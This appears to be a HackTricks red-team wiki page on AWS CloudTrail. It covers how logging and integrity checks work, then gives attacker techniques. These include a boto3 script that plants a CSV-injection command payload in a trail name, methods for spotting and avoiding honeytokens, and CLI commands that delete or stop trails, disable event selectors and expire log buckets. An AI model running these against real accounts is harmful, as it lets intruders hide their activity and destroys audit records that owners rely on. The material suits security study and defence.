AWS - CloudTrail Enum

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

CloudTrail

AWS CloudTrail records and monitors activity within your AWS environment. It captures detailed event logs, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.

Each logged event contains:

  • The name of the called API: eventName

  • The called service: eventSource

  • The time: eventTime

  • The IP address: SourceIPAddress

  • The agent method: userAgent. Examples:

    • Signing.amazonaws.com - From AWS Management Console

    • console.amazonaws.com - Root user of the account

    • lambda.amazonaws.com - AWS Lambda

  • The request parameters: requestParameters

  • The response elements: responseElements

Event's are written to a new log file approximately each 5 minutes in a JSON file, they are held by CloudTrail and finally, log files are delivered to S3 approximately 15mins after. CloudTrails logs can be aggregated across accounts and across regions. CloudTrail allows to use log file integrity in order to be able to verify that your log files have remained unchanged since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour. When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.

Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.

The logs are stored in a S3 bucket with this name format:

  • BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD

  • Being the BucketName: aws-cloudtrail-logs-<accountid>-<random>

  • Example: aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/

Inside each folder each log will have a name following this format: AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz

Log File Naming Convention

Moreover, digest files (to check file integrity) will be inside the same bucket in:

Aggregate Logs from Multiple Accounts

  • Create a Trial in the AWS account where you want the log files to be delivered to

  • Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access

  • Create a new Trail in the other AWS accounts and select to use the created bucket in step 1

However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account.

Remember that an account can have different Trails from CloudTrail enabled storing the same (or different) logs in different buckets.

Cloudtrail from all org accounts into 1

When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket:

This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).

Log Files Checking

You can check that the logs haven't been altered by running

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

Logs to CloudWatch

CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed. Note that in order to allow CloudTrail to send the logs to CloudWatch a role needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:

  • CreateLogStream: This allows to create a CloudWatch Logs log streams

  • PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream

Event History

CloudTrail Event History allows you to inspect in a table the logs that have been recorded:

Insights

CloudTrail Insights automatically analyzes write management events from CloudTrail trails and alerts you to unusual activity. For example, if there is an increase in TerminateInstance events that differs from established baselines, you’ll see it as an Insight event. These events make finding and responding to unusual API activity easier than ever.

The insights are stored in the same bucket as the CloudTrail logs in: BucketName/AWSLogs/AccountID/CloudTrail-Insight

Security

Access Advisor

AWS Access Advisor relies on last 400 days AWS CloudTrail logs to gather its insights. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to show when services were last accessed. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about refining permissions, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.

Therefore, Access Advisor informs about the unnecessary permissions being given to users so the admin could remove them

Actions

Enumeration

# Get trails info
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]

# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>

# Get data store info
aws cloudtrail list-event-data-stores
aws cloudtrail list-queries --event-data-store <data-source>
aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>

CSV Injection

It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel. The following code will generate log entry with a bad Trail name containing the payload:

import boto3
payload = "=cmd|'/C calc'|''"
client = boto3.client('cloudtrail')
response = client.create_trail(
	Name=payload,
	S3BucketName="random"
)
print(response)

For more information about CSV Injections check the page:

For more information about this specific technique check https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/

Bypass Detection

HoneyTokens bypass

Honeyokens are created to detect exfiltration of sensitive information. In case of AWS, they are AWS keys whose use is monitored, if something triggers an action with that key, then someone must have stolen that key.

However, this monitorization is performed via CloudTrail, and there are some AWS services that doesn't send logs to CloudTrail (fin the list here). Some of those services will respond with an error containing the ARN of the key role if someone unauthorised (the honeytoken key) try to access it.

This way, an attacker can obtain the ARN of the key without triggering any log. In the ARN the attacker can see the AWS account ID and the name, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken.

HoneyTokens Detection

Pacu detects if a key belongs to Canarytokens, SpaceCrab, SpaceSiren:

  • If canarytokens.org appears in the role name or the account ID 534261010715 appears in the error message.

    • Testing them more recently, they are using the account 717712589309 and still has the canarytokens.com string in the name.

  • If SpaceCrab appears in the role name in the error message

  • SpaceSiren uses uuids to generate usernames: [a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}

  • If the name looks like randomly generated, there are high probabilities that it's a HoneyToken.

Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own...

Or you can get the Account ID from the encoded inside the access key as explained here and check the account ID with your list of Honeytokens AWS accounts:

import base64
import binascii

def AWSAccount_from_AWSKeyID(AWSKeyID):
    
    trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
    x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
    y = x[0:6]
    
    z = int.from_bytes(y, byteorder='big', signed=False)
    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
    
    e = (z & mask)>>7
    return (e)

print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))

For more information check the original research.

Accessing Third Infrastructure

Certain AWS services will spawn some infrastructure such as Databases or Kubernetes clusters (EKS). A user talking directly to those services (like the Kubernetes API) won’t use the AWS API, so CloudTrail won’t be able to see this communication.

Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and talk to the API service directly without getting detected by Cloudtrail.

More info in:

Modifying CloudTrail Config

Delete trails

aws cloudtrail delete-trail --name [trail-name]

Stop trails

aws cloudtrail stop-logging --name [trail-name]

Disable multi-region logging

aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services

Disable Logging by Event Selectors

# Leave only the ReadOnly selector
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>

# Remove all selectors (stop Insights)
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>

In the first example, a single event selector is provided as a JSON array with a single object. The "ReadWriteType": "ReadOnly" indicates that the event selector should only capture read-only events (so CloudTrail insights won't be checking write events for example).

You can customize the event selector based on your specific requirements.

Logs deletion via S3 lifecycle policy

aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>

Modifying Bucket Configuration

  • Delete the S3 bucket

  • Change bucket policy to deny any writes from the CloudTrail service

  • Add lifecycle policy to S3 bucket to delete objects

  • Disable the kms key used to encrypt the CloudTrail logs

Cloudtrail ransomware

S3 ransomware

You could generate an asymmetric key and make CloudTrail encrypt the data with that key and delete the private key so the CloudTrail contents cannot be recovered cannot be recovered. This is basically a S3-KMS ransomware explained in:

KMS ransomware

This is an easiest way to perform the previous attack with different permissions requirements:

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated